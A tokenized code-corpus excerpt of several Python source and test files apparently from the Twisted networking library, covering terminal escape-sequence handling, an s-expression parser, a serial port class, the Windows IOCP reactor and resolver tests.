write ( '<STR_LIT>' ) <EOL> def singleShift3 ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def selectGraphicRendition ( self , * attributes ) : <EOL> attrs = [ ] <EOL> for a in attributes : <EOL> attrs . append ( a ) <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( attrs ) , ) ) <EOL> def horizontalTabulationSet ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def tabulationClear ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def tabulationClearAll ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def doubleHeightLine ( self , top = True ) : <EOL> if top : <EOL> self . write ( '<STR_LIT>' ) <EOL> else : <EOL> self . write ( '<STR_LIT>' ) <EOL> def singleWidthLine ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def doubleWidthLine ( self ) : <EOL> self . 
write ( '<STR_LIT>' ) <EOL> def eraseToLineEnd ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToLineBeginning ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseLine ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToDisplayEnd ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToDisplayBeginning ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseDisplay ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def deleteCharacter ( self , n = <NUM_LIT:1> ) : <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def insertLine ( self , n = <NUM_LIT:1> ) : <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def deleteLine ( self , n = <NUM_LIT:1> ) : <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def setScrollRegion ( self , first = None , last = None ) : <EOL> if first is not None : <EOL> first = '<STR_LIT>' % ( first , ) <EOL> else : <EOL> first = '<STR_LIT>' <EOL> if last is not None : <EOL> last = '<STR_LIT>' % ( last , ) <EOL> else : <EOL> last = '<STR_LIT>' <EOL> self . write ( '<STR_LIT>' % ( first , last ) ) <EOL> def resetScrollRegion ( self ) : <EOL> self . setScrollRegion ( ) <EOL> def reportCursorPosition ( self ) : <EOL> d = defer . Deferred ( ) <EOL> self . _cursorReports . append ( d ) <EOL> self . write ( '<STR_LIT>' ) <EOL> return d <EOL> def reset ( self ) : <EOL> self . cursorPos . x = self . cursorPos . y = <NUM_LIT:0> <EOL> try : <EOL> del self . _savedCursorPos <EOL> except AttributeError : <EOL> pass <EOL> self . write ( '<STR_LIT>' ) <EOL> def write ( self , bytes ) : <EOL> if bytes : <EOL> self . lastWrite = bytes <EOL> self . transport . write ( '<STR_LIT:\r\n>' . join ( bytes . split ( '<STR_LIT:\n>' ) ) ) <EOL> def writeSequence ( self , bytes ) : <EOL> self . write ( '<STR_LIT>' . join ( bytes ) ) <EOL> def loseConnection ( self ) : <EOL> self . reset ( ) <EOL> self . transport . loseConnection ( ) <EOL> def connectionLost ( self , reason ) : <EOL> if self . 
terminalProtocol is not None : <EOL> try : <EOL> self . terminalProtocol . connectionLost ( reason ) <EOL> finally : <EOL> self . terminalProtocol = None <EOL> for name , const in zip ( _KEY_NAMES , FUNCTION_KEYS ) : <EOL> setattr ( ServerProtocol , name , const ) <EOL> class ClientProtocol ( protocol . Protocol ) : <EOL> terminalFactory = None <EOL> terminal = None <EOL> state = '<STR_LIT:data>' <EOL> _escBuf = None <EOL> _shorts = { <EOL> '<STR_LIT:D>' : '<STR_LIT:index>' , <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:=>' : '<STR_LIT>' , <EOL> '<STR_LIT:>>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> '<STR_LIT:O>' : '<STR_LIT>' , <EOL> '<STR_LIT:H>' : '<STR_LIT>' , <EOL> '<STR_LIT:c>' : '<STR_LIT>' } <EOL> _longs = { <EOL> '<STR_LIT:[>' : '<STR_LIT>' , <EOL> '<STR_LIT:(>' : '<STR_LIT>' , <EOL> '<STR_LIT:)>' : '<STR_LIT>' , <EOL> '<STR_LIT:#>' : '<STR_LIT>' } <EOL> _charsets = { <EOL> '<STR_LIT:A>' : CS_UK , <EOL> '<STR_LIT:B>' : CS_US , <EOL> '<STR_LIT:0>' : CS_DRAWING , <EOL> '<STR_LIT:1>' : CS_ALTERNATE , <EOL> '<STR_LIT:2>' : CS_ALTERNATE_SPECIAL } <EOL> factory = None <EOL> def __init__ ( self , terminalFactory = None , * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if terminalFactory is not None : <EOL> self . terminalFactory = terminalFactory <EOL> self . terminalArgs = a <EOL> self . terminalKwArgs = kw <EOL> def connectionMade ( self ) : <EOL> if self . terminalFactory is not None : <EOL> self . terminal = self . terminalFactory ( * self . terminalArgs , ** self . terminalKwArgs ) <EOL> self . terminal . factory = self . factory <EOL> self . terminal . makeConnection ( self ) <EOL> def connectionLost ( self , reason ) : <EOL> if self . terminal is not None : <EOL> try : <EOL> self . terminal . connectionLost ( reason ) <EOL> finally : <EOL> del self . 
terminal <EOL> def dataReceived ( self , bytes ) : <EOL> """<STR_LIT>""" <EOL> toWrite = [ ] <EOL> for b in bytes : <EOL> if self . state == '<STR_LIT:data>' : <EOL> if b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . state = '<STR_LIT>' <EOL> elif b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . terminal . shiftOut ( ) <EOL> elif b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . terminal . shiftIn ( ) <EOL> elif b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . terminal . cursorBackward ( ) <EOL> else : <EOL> toWrite . append ( b ) <EOL> elif self . state == '<STR_LIT>' : <EOL> fName = self . _shorts . get ( b ) <EOL> if fName is not None : <EOL> self . state = '<STR_LIT:data>' <EOL> getattr ( self . terminal , fName ) ( ) <EOL> else : <EOL> state = self . _longs . get ( b ) <EOL> if state is not None : <EOL> self . state = state <EOL> else : <EOL> self . terminal . unhandledControlSequence ( '<STR_LIT>' + b ) <EOL> self . state = '<STR_LIT:data>' <EOL> elif self . state == '<STR_LIT>' : <EOL> if self . _escBuf is None : <EOL> self . _escBuf = [ ] <EOL> if b . isalpha ( ) or b == '<STR_LIT>' : <EOL> self . _handleControlSequence ( '<STR_LIT>' . join ( self . _escBuf ) , b ) <EOL> del self . _escBuf <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> self . _escBuf . append ( b ) <EOL> elif self . state == '<STR_LIT>' : <EOL> self . terminal . selectCharacterSet ( self . _charsets . get ( b , b ) , G0 ) <EOL> self . state = '<STR_LIT:data>' <EOL> elif self . state == '<STR_LIT>' : <EOL> self . terminal . selectCharacterSet ( self . _charsets . get ( b , b ) , G1 ) <EOL> self . 
state = '<STR_LIT:data>' <EOL> elif self . state == '<STR_LIT>' : <EOL> self . _handleHeightWidth ( b ) <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> def _handleControlSequence ( self , buf , terminal ) : <EOL> f = getattr ( self . controlSequenceParser , CST . get ( terminal , terminal ) , None ) <EOL> if f is None : <EOL> self . terminal . unhandledControlSequence ( '<STR_LIT>' + buf + terminal ) <EOL> else : <EOL> f ( self , self . terminal , buf ) <EOL> class ControlSequenceParser : <EOL> def _makeSimple ( ch , fName ) : <EOL> n = '<STR_LIT>' + fName <EOL> def simple ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> getattr ( handler , n ) ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> m = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + ch ) <EOL> else : <EOL> getattr ( handler , n ) ( m ) <EOL> return simple <EOL> for ( ch , fName ) in ( ( '<STR_LIT:A>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:B>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:C>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) ) : <EOL> exec ch + "<STR_LIT>" <EOL> del _makeSimple <EOL> def h ( self , proto , handler , buf ) : <EOL> try : <EOL> modes = map ( int , buf . split ( '<STR_LIT:;>' ) ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:h>' ) <EOL> else : <EOL> handler . setModes ( modes ) <EOL> def l ( self , proto , handler , buf ) : <EOL> try : <EOL> modes = map ( int , buf . split ( '<STR_LIT:;>' ) ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:l>' ) <EOL> else : <EOL> handler . resetModes ( modes ) <EOL> def r ( self , proto , handler , buf ) : <EOL> parts = buf . split ( '<STR_LIT:;>' ) <EOL> if len ( parts ) == <NUM_LIT:1> : <EOL> handler . 
setScrollRegion ( None , None ) <EOL> elif len ( parts ) == <NUM_LIT:2> : <EOL> try : <EOL> if parts [ <NUM_LIT:0> ] : <EOL> pt = int ( parts [ <NUM_LIT:0> ] ) <EOL> else : <EOL> pt = None <EOL> if parts [ <NUM_LIT:1> ] : <EOL> pb = int ( parts [ <NUM_LIT:1> ] ) <EOL> else : <EOL> pb = None <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:r>' ) <EOL> else : <EOL> handler . setScrollRegion ( pt , pb ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:r>' ) <EOL> def K ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . eraseToLineEnd ( ) <EOL> elif buf == '<STR_LIT:1>' : <EOL> handler . eraseToLineBeginning ( ) <EOL> elif buf == '<STR_LIT:2>' : <EOL> handler . eraseLine ( ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT>' ) <EOL> def H ( self , proto , handler , buf ) : <EOL> handler . cursorHome ( ) <EOL> def J ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . eraseToDisplayEnd ( ) <EOL> elif buf == '<STR_LIT:1>' : <EOL> handler . eraseToDisplayBeginning ( ) <EOL> elif buf == '<STR_LIT:2>' : <EOL> handler . eraseDisplay ( ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT>' ) <EOL> def P ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . deleteCharacter ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> n = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:P>' ) <EOL> else : <EOL> handler . deleteCharacter ( n ) <EOL> def L ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . insertLine ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> n = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:L>' ) <EOL> else : <EOL> handler . insertLine ( n ) <EOL> def M ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . 
deleteLine ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> n = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:M>' ) <EOL> else : <EOL> handler . deleteLine ( n ) <EOL> def n ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> x , y = handler . reportCursorPosition ( ) <EOL> proto . transport . write ( '<STR_LIT>' % ( x + <NUM_LIT:1> , y + <NUM_LIT:1> ) ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:n>' ) <EOL> def m ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . selectGraphicRendition ( NORMAL ) <EOL> else : <EOL> attrs = [ ] <EOL> for a in buf . split ( '<STR_LIT:;>' ) : <EOL> try : <EOL> a = int ( a ) <EOL> except ValueError : <EOL> pass <EOL> attrs . append ( a ) <EOL> handler . selectGraphicRendition ( * attrs ) <EOL> controlSequenceParser = ControlSequenceParser ( ) <EOL> def _handleHeightWidth ( self , b ) : <EOL> if b == '<STR_LIT:3>' : <EOL> self . terminal . doubleHeightLine ( True ) <EOL> elif b == '<STR_LIT:4>' : <EOL> self . terminal . doubleHeightLine ( False ) <EOL> elif b == '<STR_LIT:5>' : <EOL> self . terminal . singleWidthLine ( ) <EOL> elif b == '<STR_LIT>' : <EOL> self . terminal . doubleWidthLine ( ) <EOL> else : <EOL> self . terminal . unhandledControlSequence ( '<STR_LIT>' + b ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> def parse ( s ) : <EOL> s = s . strip ( ) <EOL> expr = [ ] <EOL> while s : <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT:(>' : <EOL> newSexp = [ ] <EOL> if expr : <EOL> expr [ - <NUM_LIT:1> ] . append ( newSexp ) <EOL> expr . append ( newSexp ) <EOL> s = s [ <NUM_LIT:1> : ] <EOL> continue <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT:)>' : <EOL> aList = expr . pop ( ) <EOL> s = s [ <NUM_LIT:1> : ] <EOL> if not expr : <EOL> assert not s <EOL> return aList <EOL> continue <EOL> i = <NUM_LIT:0> <EOL> while s [ i ] . isdigit ( ) : i += <NUM_LIT:1> <EOL> assert i <EOL> length = int ( s [ : i ] ) <EOL> data = s [ i + <NUM_LIT:1> : i + <NUM_LIT:1> + length ] <EOL> expr [ - <NUM_LIT:1> ] . append ( data ) <EOL> s = s [ i + <NUM_LIT:1> + length : ] <EOL> assert <NUM_LIT:0> , "<STR_LIT>" <EOL> def pack ( sexp ) : <EOL> s = "<STR_LIT>" <EOL> for o in sexp : <EOL> if type ( o ) in ( type ( ( ) ) , type ( [ ] ) ) : <EOL> s += '<STR_LIT:(>' <EOL> s += pack ( o ) <EOL> s += '<STR_LIT:)>' <EOL> else : <EOL> s += '<STR_LIT>' % ( len ( o ) , o ) <EOL> return s </s>
<s> from twisted . trial import unittest <EOL> from twisted . conch . insults import helper , text <EOL> A = text . attributes <EOL> class Serialization ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . attrs = helper . CharacterAttribute ( ) <EOL> def testTrivial ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . normal [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testBold ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . bold [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testUnderline ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . underline [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testBlink ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . blink [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testReverseVideo ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . reverseVideo [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testMinus ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . bold [ A . blink [ '<STR_LIT>' , - A . bold [ '<STR_LIT>' ] , '<STR_LIT:.>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testForeground ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . normal [ A . fg . red [ '<STR_LIT>' ] , A . fg . green [ '<STR_LIT>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testBackground ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . normal [ A . bg . red [ '<STR_LIT>' ] , A . bg . green [ '<STR_LIT>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> class EfficiencyTestCase ( unittest . TestCase ) : <EOL> todo = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def setUp ( self ) : <EOL> self . attrs = helper . CharacterAttribute ( ) <EOL> def testComplexStructure ( self ) : <EOL> output = A . normal [ <EOL> A . bold [ <EOL> A . bg . 
cyan [ <EOL> A . fg . red [ <EOL> "<STR_LIT>" , <EOL> A . blink [ <EOL> "<STR_LIT>" ] , <EOL> - A . bold [ <EOL> "<STR_LIT>" ] ] , <EOL> A . fg . green [ <EOL> "<STR_LIT>" ] ] ] ] <EOL> self . assertEqual ( <EOL> text . flatten ( output , self . attrs ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def testNesting ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . bold [ '<STR_LIT>' , A . underline [ '<STR_LIT>' ] ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . bold [ A . reverseVideo [ '<STR_LIT>' , A . normal [ '<STR_LIT>' ] , '<STR_LIT:.>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import os , errno <EOL> import serial <EOL> from serial import PARITY_NONE , PARITY_EVEN , PARITY_ODD <EOL> from serial import STOPBITS_ONE , STOPBITS_TWO <EOL> from serial import FIVEBITS , SIXBITS , SEVENBITS , EIGHTBITS <EOL> from serialport import BaseSerialPort <EOL> from twisted . internet import abstract , fdesc , main <EOL> class SerialPort ( BaseSerialPort , abstract . FileDescriptor ) : <EOL> """<STR_LIT>""" <EOL> connected = <NUM_LIT:1> <EOL> def __init__ ( self , protocol , deviceNameOrPortNumber , reactor , <EOL> baudrate = <NUM_LIT> , bytesize = EIGHTBITS , parity = PARITY_NONE , <EOL> stopbits = STOPBITS_ONE , timeout = <NUM_LIT:0> , xonxoff = <NUM_LIT:0> , rtscts = <NUM_LIT:0> ) : <EOL> abstract . FileDescriptor . __init__ ( self , reactor ) <EOL> self . _serial = self . _serialFactory ( <EOL> deviceNameOrPortNumber , baudrate = baudrate , bytesize = bytesize , <EOL> parity = parity , stopbits = stopbits , timeout = timeout , <EOL> xonxoff = xonxoff , rtscts = rtscts ) <EOL> self . reactor = reactor <EOL> self . flushInput ( ) <EOL> self . flushOutput ( ) <EOL> self . protocol = protocol <EOL> self . protocol . makeConnection ( self ) <EOL> self . startReading ( ) <EOL> def fileno ( self ) : <EOL> return self . _serial . fd <EOL> def writeSomeData ( self , data ) : <EOL> """<STR_LIT>""" <EOL> return fdesc . writeToFD ( self . fileno ( ) , data ) <EOL> def doRead ( self ) : <EOL> """<STR_LIT>""" <EOL> return fdesc . readFromFD ( self . fileno ( ) , self . protocol . dataReceived ) <EOL> def connectionLost ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> abstract . FileDescriptor . connectionLost ( self , reason ) <EOL> self . _serial . close ( ) <EOL> self . protocol . connectionLost ( reason ) </s>
<s> """<STR_LIT>""" <EOL> import warnings , socket , sys <EOL> from zope . interface import implements <EOL> from twisted . internet import base , interfaces , main , error <EOL> from twisted . python import log , failure <EOL> from twisted . internet . _dumbwin32proc import Process <EOL> from twisted . internet . win32eventreactor import _ThreadedWin32EventsMixin <EOL> from twisted . internet . iocpreactor import iocpsupport as _iocp <EOL> from twisted . internet . iocpreactor . const import WAIT_TIMEOUT <EOL> from twisted . internet . iocpreactor import tcp , udp <EOL> try : <EOL> from twisted . protocols . tls import TLSMemoryBIOFactory <EOL> except ImportError : <EOL> TLSMemoryBIOFactory = None <EOL> _extraInterfaces = ( ) <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> _extraInterfaces = ( interfaces . IReactorSSL , ) <EOL> from twisted . python . compat import set <EOL> MAX_TIMEOUT = <NUM_LIT> <EOL> EVENTS_PER_LOOP = <NUM_LIT:1000> <EOL> KEY_NORMAL , KEY_WAKEUP = range ( <NUM_LIT:2> ) <EOL> _NO_GETHANDLE = error . ConnectionFdescWentAway ( <EOL> '<STR_LIT>' ) <EOL> _NO_FILEDESC = error . ConnectionFdescWentAway ( '<STR_LIT>' ) <EOL> class IOCPReactor ( base . _SignalReactorMixin , base . ReactorBase , <EOL> _ThreadedWin32EventsMixin ) : <EOL> implements ( interfaces . IReactorTCP , interfaces . IReactorUDP , <EOL> interfaces . IReactorMulticast , interfaces . IReactorProcess , <EOL> * _extraInterfaces ) <EOL> port = None <EOL> def __init__ ( self ) : <EOL> base . ReactorBase . __init__ ( self ) <EOL> self . port = _iocp . CompletionPort ( ) <EOL> self . handles = set ( ) <EOL> def addActiveHandle ( self , handle ) : <EOL> self . handles . add ( handle ) <EOL> def removeActiveHandle ( self , handle ) : <EOL> self . handles . 
discard ( handle ) <EOL> def doIteration ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> processed_events = <NUM_LIT:0> <EOL> if timeout is None : <EOL> timeout = MAX_TIMEOUT <EOL> else : <EOL> timeout = min ( MAX_TIMEOUT , int ( <NUM_LIT:1000> * timeout ) ) <EOL> rc , bytes , key , evt = self . port . getEvent ( timeout ) <EOL> while <NUM_LIT:1> : <EOL> if rc == WAIT_TIMEOUT : <EOL> break <EOL> if key != KEY_WAKEUP : <EOL> assert key == KEY_NORMAL <EOL> log . callWithLogger ( evt . owner , self . _callEventCallback , <EOL> rc , bytes , evt ) <EOL> processed_events += <NUM_LIT:1> <EOL> if processed_events >= EVENTS_PER_LOOP : <EOL> break <EOL> rc , bytes , key , evt = self . port . getEvent ( <NUM_LIT:0> ) <EOL> def _callEventCallback ( self , rc , bytes , evt ) : <EOL> owner = evt . owner <EOL> why = None <EOL> try : <EOL> evt . callback ( rc , bytes , evt ) <EOL> handfn = getattr ( owner , '<STR_LIT>' , None ) <EOL> if not handfn : <EOL> why = _NO_GETHANDLE <EOL> elif handfn ( ) == - <NUM_LIT:1> : <EOL> why = _NO_FILEDESC <EOL> if why : <EOL> return <EOL> except : <EOL> why = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> log . err ( ) <EOL> if why : <EOL> owner . loseConnection ( failure . Failure ( why ) ) <EOL> def installWaker ( self ) : <EOL> pass <EOL> def wakeUp ( self ) : <EOL> self . port . postEvent ( <NUM_LIT:0> , KEY_WAKEUP , None ) <EOL> def registerHandle ( self , handle ) : <EOL> self . port . addHandle ( handle , KEY_NORMAL ) <EOL> def createSocket ( self , af , stype ) : <EOL> skt = socket . socket ( af , stype ) <EOL> self . registerHandle ( skt . fileno ( ) ) <EOL> return skt <EOL> def listenTCP ( self , port , factory , backlog = <NUM_LIT:50> , interface = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> p = tcp . Port ( port , factory , backlog , interface , self ) <EOL> p . startListening ( ) <EOL> return p <EOL> def connectTCP ( self , host , port , factory , timeout = <NUM_LIT:30> , bindAddress = None ) : <EOL> """<STR_LIT>""" <EOL> c = tcp . 
Connector ( host , port , factory , timeout , bindAddress , self ) <EOL> c . connect ( ) <EOL> return c <EOL> if TLSMemoryBIOFactory is not None : <EOL> def listenSSL ( self , port , factory , contextFactory , backlog = <NUM_LIT:50> , interface = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> port = self . listenTCP ( <EOL> port , <EOL> TLSMemoryBIOFactory ( contextFactory , False , factory ) , <EOL> backlog , interface ) <EOL> port . _type = '<STR_LIT>' <EOL> return port <EOL> def connectSSL ( self , host , port , factory , contextFactory , timeout = <NUM_LIT:30> , bindAddress = None ) : <EOL> """<STR_LIT>""" <EOL> return self . connectTCP ( <EOL> host , port , <EOL> TLSMemoryBIOFactory ( contextFactory , True , factory ) , <EOL> timeout , bindAddress ) <EOL> else : <EOL> def listenSSL ( self , port , factory , contextFactory , backlog = <NUM_LIT:50> , interface = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def connectSSL ( self , host , port , factory , contextFactory , timeout = <NUM_LIT:30> , bindAddress = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def listenUDP ( self , port , protocol , interface = '<STR_LIT>' , maxPacketSize = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> p = udp . Port ( port , protocol , interface , maxPacketSize , self ) <EOL> p . startListening ( ) <EOL> return p <EOL> def listenMulticast ( self , port , protocol , interface = '<STR_LIT>' , maxPacketSize = <NUM_LIT> , <EOL> listenMultiple = False ) : <EOL> """<STR_LIT>""" <EOL> p = udp . MulticastPort ( port , protocol , interface , maxPacketSize , self , <EOL> listenMultiple ) <EOL> p . 
startListening ( ) <EOL> return p <EOL> def spawnProcess ( self , processProtocol , executable , args = ( ) , env = { } , <EOL> path = None , uid = None , gid = None , usePTY = <NUM_LIT:0> , childFDs = None ) : <EOL> """<STR_LIT>""" <EOL> if uid is not None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if gid is not None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if usePTY : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if childFDs is not None : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args , env = self . _checkProcessArgs ( args , env ) <EOL> return Process ( self , processProtocol , executable , args , env , path ) <EOL> def removeAll ( self ) : <EOL> res = list ( self . handles ) <EOL> self . handles . clear ( ) <EOL> return res <EOL> def install ( ) : <EOL> r = IOCPReactor ( ) <EOL> main . installReactor ( r ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> from Queue import Queue <EOL> from zope . interface import implements <EOL> from twisted . python . threadpool import ThreadPool <EOL> from twisted . python . util import setIDFunction <EOL> from twisted . internet . interfaces import IReactorTime , IReactorThreads <EOL> from twisted . internet . error import DNSLookupError <EOL> from twisted . internet . base import ThreadedResolver , DelayedCall <EOL> from twisted . internet . task import Clock <EOL> from twisted . trial . unittest import TestCase <EOL> class FakeReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IReactorTime , IReactorThreads ) <EOL> def __init__ ( self ) : <EOL> self . _clock = Clock ( ) <EOL> self . callLater = self . _clock . callLater <EOL> self . _threadpool = ThreadPool ( ) <EOL> self . _threadpool . start ( ) <EOL> self . getThreadPool = lambda : self . _threadpool <EOL> self . _threadCalls = Queue ( ) <EOL> def callFromThread ( self , f , * args , ** kwargs ) : <EOL> self . _threadCalls . put ( ( f , args , kwargs ) ) <EOL> def _runThreadCalls ( self ) : <EOL> f , args , kwargs = self . _threadCalls . get ( ) <EOL> f ( * args , ** kwargs ) <EOL> def _stop ( self ) : <EOL> self . _threadpool . stop ( ) <EOL> class ThreadedResolverTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_success ( self ) : <EOL> """<STR_LIT>""" <EOL> ip = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> timeout = <NUM_LIT:30> <EOL> reactor = FakeReactor ( ) <EOL> self . addCleanup ( reactor . _stop ) <EOL> lookedUp = [ ] <EOL> resolvedTo = [ ] <EOL> def fakeGetHostByName ( name ) : <EOL> lookedUp . append ( name ) <EOL> return ip <EOL> self . patch ( socket , '<STR_LIT>' , fakeGetHostByName ) <EOL> resolver = ThreadedResolver ( reactor ) <EOL> d = resolver . getHostByName ( name , ( timeout , ) ) <EOL> d . addCallback ( resolvedTo . append ) <EOL> reactor . _runThreadCalls ( ) <EOL> self . assertEqual ( lookedUp , [ name ] ) <EOL> self . 
